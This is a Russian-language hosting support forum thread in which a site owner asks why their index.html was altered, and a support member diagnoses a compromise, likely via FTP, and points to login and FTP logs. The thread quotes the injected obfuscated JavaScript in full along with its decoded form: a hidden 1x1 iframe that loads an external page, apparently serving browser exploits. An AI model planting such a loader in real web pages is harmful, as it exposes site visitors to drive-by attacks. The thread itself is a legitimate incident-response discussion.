Кто-то правит index.html

Если не нашли подходящего форума - задайте вопрос здесь

Модераторы: Art.i, garry

Кто-то правит index.html

Сообщение KaPuHa » Пн май 21, 2007 1:37 pm

Добрый день.
Кому будет не сложно, ответьте...

Не могу понять почему у меня постоянно меняется index.html и как это вообще возможно.
Вобщем последняя ситуация была такая.
В index.html было написано всего одно слово.
Не могу цитировать его тут :) Но пускай, допустим, это слово будет ПРИВЕТ.

Так вот позже, неизвестно почему, индекс на всех доменах изменился на:
Код: выделить все
ПРИВЕТ<!-- o65 --><Script Language='Javascript'>
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%67%70%74%2D%70%61%6C%2E%63%6F%6D%2F%73%63%72%69%70%74%73%2F%74%65%6D%70%6C%61%74%65%73%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%68%74%6D%6C%3E'));
//-->
</Script> <!-- c65 -->


Переведя на нормальный язык, туда впендюрилось вот это:
Код: выделить все
<html><iframe src=http://www.gpt-pal.com/scripts/templates/index.html frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>


Что это такое? И каким обраом оно могло появиться. Дайте пожалуйста совет.
То что у меня украли пароль от рута или других пользователей я исключаю.
Где можно посмотреть обо всём этом в логах? Да и вообще что это может быть, какие у вас предположения?
KaPuHa
 
Сообщений: 20
Зарегистрирован: Пт дек 09, 2005 6:00 pm

Сообщение art » Пн май 21, 2007 2:25 pm

Это значит что Вас взломали. И Вам вставляют iframe. Как правило в нем находится какой нибудь код который пытается взломать IE ваших посетителей.

Команда last показывает кто и когда заходил.

Если у Вас сперли пароль root то скорее всего всех дырок Вы не закроете. И они запросто могут за собой и логи чистить. Но если у Вас пароль для root сложный то взломать его не просто.

Скорее всего взломали ftp пользователя админа сайта. Если никто кроме Вас на сервер по ftp не ходит. То можете просто закрыть его файрволом или банально выключать. И по необходимости включать.
art
Support team
 
Сообщений: 798
Зарегистрирован: Вс июн 11, 2006 2:37 am

Сообщение KaPuHa » Пн май 21, 2007 3:27 pm

Большое спасибо за ответ. Будем разбираться...
KaPuHa
 
Сообщений: 20
Зарегистрирован: Пт дек 09, 2005 6:00 pm

Сообщение art » Пн май 21, 2007 3:57 pm

Если разбираться то смотреть в

/var/log/auth.log все логины на сервер

/var/log/xferlog - все скачивания и закачивания по ftp.
art
Support team
 
Сообщений: 798
Зарегистрирован: Вс июн 11, 2006 2:37 am


Вернуться в Любые вопросы

Кто сейчас на форуме

Сейчас этот форум просматривают: нет зарегистрированных пользователей и гости: 1